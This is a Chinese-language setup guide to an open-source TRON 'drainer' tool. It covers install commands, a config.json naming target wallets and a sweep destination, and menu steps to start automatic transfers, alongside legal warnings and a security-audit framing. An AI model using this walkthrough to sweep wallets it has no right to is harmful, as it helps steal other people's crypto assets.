fiercewarrior84/TRX-Drainer-Tool · 上手攻略

  • 仓库:fiercewarrior84/TRX-Drainer-Tool
  • 链接:https://github.com/fiercewarrior84/TRX-Drainer-Tool
  • 分类:加密工具 / TRON / 安全审计(⚠️ 争议类工具)
  • 作者:Tom
  • 更新:2026-09-07

这是什么

TRX Drainer Tool 是一个自动化的 TRON 钱包扫荡工具,用于监控目标 TRON 钱包地址,一旦余额超过设定阈值则自动将 TRX 和 TRC20 代币转出。核心功能包括:实时余额监控、多钱包批量扫荡、TronLink / Trust Wallet 兼容性、隐身模式能量优化交易路由、Telegram 通知等。

⚠️ 严重风险提示(GitHub README 原文):「This tool is provided for educational and research purposes only. Unauthorized access to wallets you do not own is illegal.」本攻略仅作客观技术记录,不提供任何使用建议,不鼓励、不协助任何未经授权的访问行为。


技术架构

TRX-Drainer-Tool/
├── main.py           # 入口,终端交互菜单
├── config.py         # 配置加载器
├── bot_actions.py    # 核心扫荡逻辑
├── config.json       # 用户配置
├── requirements.txt # Python 依赖
└── actions/         # 菜单各选项实现
    ├── about.py
    ├── install.py
    └── settings.py

核心技术栈: - tronpy:TRON RPC 客户端,与 TronGrid / 任意 TRON 全节点通信 - requests:价格数据获取 - rich:终端 UI 渲染 - cryptography:数据加密

支持的代币类型(README 自述): - 原生代币:TRX - 稳定币:USDT、USDC、TUSD、USDJ - DeFi:JST、SUN、WIN、BTT - NFT:APENFT 等


快速安装

环境要求

  • Python 3.10+
  • Windows 10/11、macOS 12+ 或 Linux

步骤

git clone https://github.com/fiercewarrior84/TRX-Drainer-Tool.git
cd TRX-Drainer-Tool

# Windows
run.bat

# macOS / Linux
chmod +x run.sh
./run.sh

或手动安装依赖:

pip install -r requirements.txt
python main.py

配置说明

编辑 config.json

{
  "target_wallets": ["TXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"],
  "destination_wallet": "TXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "drain_mode": "sweep",
  "min_balance_trx": 100,
  "include_trc20": true,
  "trc20_tokens": ["USDT", "USDC", "BTT", "WIN", "JST"],
  "rpc_endpoint": "https://api.trongrid.io",
  "energy_optimize": true,
  "auto_confirm": true,
  "fee_limit": 10000000
}

关键参数: - target_wallets:监控目标地址列表(需持有者的私钥或助记词才能实际转出,⚠️ 原文未说明如何获取目标钱包访问权限) - destination_wallet:接收资金的目标地址 - drain_modesweep(全部转出)或 selective(选择性) - min_balance_trx:触发转出的最低 TRX 余额阈值 - energy_optimize:启用能量优化(费用委托 + 能量租赁降低 Gas 消耗) - fee_limit:单笔交易最大手续费(单位:SUN,1 SUN = 10⁻⁶ TRX)


工作流程(菜单界面)

python main.py

# 菜单选项:
# 1 - 安装依赖
# 4 - 添加目标钱包(输入 TRON 地址)
# 5 - 设置目标接收钱包
# 6 - 启动扫荡(开始监控 + 转账)
# 7 - 停止所有操作
# 8 - 查看状态
# 0 - 退出

典型适用场景(⚠️ 仅限合法用途)

以下场景均为 README 自述或公开信息可推断用途,不构成使用建议:

  1. 安全研究人员:了解 TRON 钱包自动化扫荡的攻击向量,用于构建防御机制
  2. 钱包开发者:测试自己钱包对异常出账请求的抗性
  3. CTF / 区块链安全竞赛:作为合法的攻防演练素材
  4. 用户自查:监控自己的热钱包余额异常变动(需自行运行并配置自己的地址为 source + destination)

坑与注意

⚠️ 法律与合规风险(最高优先级)

  1. 未经授权转账违法:在任何司法管辖区,未经他人许可转移他人资产均可能构成盗窃罪或相关计算机犯罪。中国、美国、欧盟等均有明确法律约束。
  2. 工具本身不包含攻击代码:但 README 明确以「扫荡他人钱包」为核心用途设计。
  3. 无法单靠此工具攻击任意钱包:TRON 钱包转账需要目标钱包的私钥签名,工具本身不提供私钥获取能力——任何声称能直接转账他人资产的工具均涉及更上游的私钥窃取行为。

技术层面的安全考量

  1. 私钥暴露风险:若要求用户提供目标钱包私钥(而非只读地址),任何此类要求都是高危信号——此类信息一旦提供,资产将立即失守。
  2. TRON 能量模型费用:TRON 转账手续费使用 Energy/Bandwidth 资源模型,fee_limit 设置过低会导致大额转账失败,过高则浪费 TRX。
  3. 多 RPC 容灾:工具支持自定义 RPC 端点,但建议使用 TronGrid(官方)或 Ankr 等有 SLA 保障的服务,避免轮询中断。
  4. ** Telegram 通知**:启用后监控状态会上报到第三方,存在信息泄露风险。

与同类对比

项目 简介 与本工具对比
TronTool Python TRON 库,可用于构建任意 TRON 交互 中立库,本工具是特化于自动化转出的专用程序
SlowMist 威胁情报 区块链安全公司追踪的 Drainer 即服务 (DaaS) 此类攻击已形成地下产业链,实际攻击远比开源 Demo 复杂
TRON Grid API 官方 RPC 和 API 服务 本工具的技术依赖层,非竞品

一句话结论(安全审计视角)

⚠️ 本工具是 TRON 生态下钱包自动化扫荡的开源参考实现,其核心功能(未经授权自动转出他人资产)在绝大多数司法管辖区属于违法行为;安全研究人员和钱包开发者可将其作为防御性研究素材,但任何人不得将其用于非法目的。本攻略仅作技术记录。